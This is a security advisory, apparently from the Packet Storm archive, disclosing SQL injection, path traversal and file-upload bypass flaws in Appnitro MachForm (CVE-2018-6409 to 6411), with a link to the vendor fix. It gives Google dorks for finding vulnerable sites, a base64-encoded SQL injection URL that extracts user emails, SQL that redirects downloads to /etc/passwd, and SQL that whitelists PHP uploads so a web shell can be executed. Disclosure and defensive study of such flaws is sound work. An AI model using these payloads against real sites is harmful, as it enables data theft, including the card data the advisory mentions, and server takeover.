exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Appnitro MachForm SQL Injection / Traversal / File Upload

Appnitro MachForm SQL Injection / Traversal / File Upload
Posted May 28, 2018
Authored by Amine Taouirsa

Appnitro MachForm suffers from remote file upload, remote SQL injection, and path traversal vulnerabilities.

tags | exploit, remote, vulnerability, sql injection, file inclusion, file upload
advisories | CVE-2018-6409, CVE-2018-6410, CVE-2018-6411
SHA-256 | 29ad09f6e7112cceddfe216c07e3423ff01d9605ecbdf939deff018b09bb2832

Appnitro MachForm SQL Injection / Traversal / File Upload

Change Mirror Download
Vendor: Appnitro
Product webpage: https://www.machform.com/
Full-Disclose: https://metalamin.github.io/MachForm-not-0-day-EN/
Fix: https://www.machform.com/blog-machform-423-security-release/

Author: Amine Taouirsa
@metalamin

Google dork examples:
----------------------
"machform" inurl:"view.php"
"machform" inurl:"embed.php"

Summary:
---------
The form creation platform MachForm from Appnitro is subject to SQL
injections that lead to path traversal and arbitrary file upload.

The application is widely deployed and with some google dorks itas possible
to find various webpages storing sensitive data as credit card numbers with
corresponding security codes. Also, the arbitrary file upload can let an
attacker get control of the server by uploading a WebShell.

[1] SQL injection (CVE-2018-6410):
-------------------------

[1.1] Description:
The software is subject to SQL injections in the adownload.phpa file.

[1.2] Parameters and statement:
This SQLi can be found on the parameter aqa which a base64 encoded value
for the following parameters:

$form_id = $params['form_id'];
$id = $params['id'];
$field_name = $params['el'];
$file_hash = $params['hash'];


So the injectable parameters are aela and aform_ida obtaining error-based,
stacked queries and time-based blind SQL injections. This is due to the
following vulnerable statement:

$query = "select {$field_name} from `".MF_TABLE_PREFIX."form_{$form_id}`
where id=?";


[1.3] POC
Proof of concept to get the first user mail:
http:// [URL] / [Machform_folder]
/download.php?q=ZWw9IChTRUxFQ1QgMSBGUk9NKFNFTEVDVCBDT1VOVCgqKSxDT05DQVQoMHgyMDIwLChTRUxFQ1QgTUlEKCh1c2VyX2VtYWlsKSwxLDUwKSBGUk9NIGFwX3VzZXJzIE9SREVSIEJZIHVzZXJfaWQgTElNSVQgMCwxKSwweDIwMjAsRkxPT1IoUkFORCgwKSoyKSl4IEZST00gSU5GT1JNQVRJT05fU0NIRU1BLkNIQVJBQ1RFUl9TRVRTIEdST1VQIEJZIHgpYSkgOyZpZD0xJmhhc2g9MSZmb3JtX2lkPTE=

Which is the base64 encoding for:
el= (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x2020,(SELECT
MID((user_email),1,50) FROM ap_users ORDER BY user_id LIMIT
0,1),0x2020,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP
BY x)a) ;&id=1&hash=1&form_id=1


[2] Path traversal (CVE-2018-6409):
-----------------------------------

[2.1] Descrition
download.phpa is used to serve stored files from the forms answers.
Modifying the name of the file to serve on the corresponding ap_form table
leads to a path traversal vulnerability.

[2.2] POC
First we need to change the name for the element on the form:
update ap_form_58009 set
element_4="../../../../../../../../../../../../../../../../etc/passwd"
where id=1;

Now in order to be able to download it, we need to access:
http:// [URL] / [Machform_folder]
/download.php?q=ZWw9NCZpZD0xJmhhc2g9NDAyYmEwMjMwZDZmNDRhMmRlNTkwYWMxMTEwN2E0NTgmZm9ybV9pZD01ODAwOQo=

Which is the base64 encoding for;
el=4&id=1&hash=402ba0230d6f44a2de590ac11107a458&form_id=58009

Note that hash is the MD5 of the corresponding filename:
md5("../../../../../../../../../../../../../../../../etc/passwd") =
402ba0230d6f44a2de590ac11107a458

[3] Bypass file upload filter (CVE-2018-6411):
----------------------------------------------

When the form is set to filter a blacklist, it automatically add dangerous
extensions to the filters.
If the filter is set to a whitelist, the dangerous extensions can be
bypassed.

This can be done directly on the database via SQLi
update ap_form_elements set
element_file_type_list="php",element_file_block_or_allow="a" where
form_id=58009 and element_id=4;

Once uploaded the file can be found and executed in the following URL:
http:// [URL] / [Machform_folder] /data/form_58009/files/ [filename]

The filename can be found in the database
SELECT element_4 FROM ap_form_58009 WHERE id=1;

--

Amine Taouirsa

Hacking | Head of Hacking Research

amine_taouirsa@innotecsystem.com

T. +34 917 281 504 | M. +34 644 486 240

Avda. Llano Castellano, 43 28034 MADRID


<http://www.innotecsystem.com/>


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close